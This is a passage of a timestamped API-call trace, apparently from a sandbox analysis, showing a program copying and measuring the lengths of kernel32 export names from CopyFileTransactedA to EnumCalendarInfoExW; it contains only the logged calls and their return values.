(lpString="COPYFILETRANSACTEDA") returned 19 [0081.109] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0081.109] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0081.109] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0081.109] lstrlenA (lpString="COPYFILEW") returned 9 [0081.109] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0081.109] lstrlenA (lpString="COPYLZFILE") returned 10 [0081.109] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0081.109] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0081.109] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0081.109] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0081.109] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0081.109] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0081.109] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0081.109] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0081.109] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0081.109] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0081.109] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0081.109] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0081.109] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0081.109] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0081.109] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0081.109] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0081.109] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0081.109] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0081.109] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0081.109] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0081.109] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0081.109] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0081.110] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0081.110] lstrlenA (lpString="CREATEEVENTA") returned 12 [0081.110] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0081.110] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0081.110] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0081.110] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0081.110] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0081.110] lstrlenA (lpString="CREATEEVENTW") returned 12 [0081.110] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0081.110] lstrlenA (lpString="CREATEFIBER") returned 11 [0081.110] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0081.110] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0081.110] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0081.110] lstrlenA (lpString="CREATEFILEA") returned 11 [0081.110] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0081.110] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0081.110] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0081.110] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0081.110] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0081.110] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0081.110] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0081.110] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0081.110] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0081.110] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0081.110] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0081.110] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0081.110] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0081.110] lstrlenA (lpString="CREATEFILEW") returned 11 [0081.110] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0081.110] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0081.110] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0081.110] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0081.110] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0081.110] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0081.111] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0081.111] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0081.111] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0081.111] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0081.111] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0081.111] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0081.111] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0081.111] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0081.111] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0081.111] lstrlenA (lpString="CREATEJOBSET") returned 12 [0081.111] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0081.111] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0081.111] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0081.111] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0081.111] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0081.111] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0081.111] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0081.111] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0081.111] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0081.111] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0081.111] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0081.111] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0081.111] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0081.111] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0081.111] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0081.111] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0081.111] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0081.111] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0081.111] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0081.111] lstrlenA (lpString="CREATEPIPE") returned 10 [0081.111] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0081.111] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0081.111] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0081.111] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0081.111] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0081.111] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0081.111] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0081.111] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0081.111] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0081.111] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0081.112] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0081.112] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0081.112] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0081.112] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0081.112] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0081.112] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0081.112] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0081.112] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0081.112] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0081.112] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0081.112] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0081.112] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0081.112] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0081.112] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0081.112] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0081.112] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0081.112] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0081.112] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0081.112] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0081.112] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0081.112] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0081.112] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0081.112] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0081.112] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0081.112] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0081.112] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0081.112] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0081.112] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0081.112] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0081.112] lstrlenA (lpString="CREATETHREAD") returned 12 [0081.112] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0081.112] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0081.112] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0081.112] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0081.112] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0081.112] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0081.112] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0081.112] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0081.112] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0081.113] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0081.113] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0081.113] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0081.113] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0081.113] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0081.113] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0081.113] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0081.113] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0081.113] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0081.113] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0081.113] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0081.113] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0081.113] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0081.113] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0081.113] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0081.113] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0081.113] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0081.113] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0081.113] lstrlenA (lpString="CTRLROUTINE") returned 11 [0081.113] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0081.113] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0081.113] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0081.113] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0081.113] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0081.113] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0081.113] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0081.113] lstrlenA (lpString="DEBUGBREAK") returned 10 [0081.113] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0081.113] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0081.113] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0081.113] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0081.113] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0081.113] lstrlenA (lpString="DECODEPOINTER") returned 13 [0081.113] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0081.113] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0081.113] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0081.113] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0081.113] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0081.113] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0081.113] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0081.114] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0081.114] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0081.114] lstrlenA (lpString="DELETEATOM") returned 10 [0081.114] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0081.114] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0081.114] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0081.114] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0081.114] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0081.114] lstrlenA (lpString="DELETEFIBER") returned 11 [0081.114] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0081.114] lstrlenA (lpString="DELETEFILEA") returned 11 [0081.114] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0081.114] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0081.114] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0081.114] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0081.114] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0081.114] lstrlenA (lpString="DELETEFILEW") returned 11 [0081.114] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0081.114] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0081.114] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0081.114] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0081.114] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0081.114] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0081.114] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0081.114] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0081.114] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0081.114] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0081.114] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0081.114] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0081.114] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0081.114] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0081.114] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0081.114] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0081.114] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0081.114] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0081.114] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0081.114] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0081.114] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0081.114] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0081.115] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0081.115] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0081.115] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0081.115] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0081.115] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0081.115] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0081.115] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0081.115] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0081.115] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0081.115] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0081.115] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0081.115] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0081.115] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0081.115] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0081.115] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0081.115] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0081.115] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0081.115] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0081.115] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0081.115] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0081.115] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0081.115] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0081.115] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0081.115] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0081.115] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0081.115] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0081.115] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0081.115] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0081.115] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0081.115] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0081.115] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0081.115] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0081.115] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0081.115] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0081.115] lstrcpyA (in: lpString1=0x3f2c7fc, 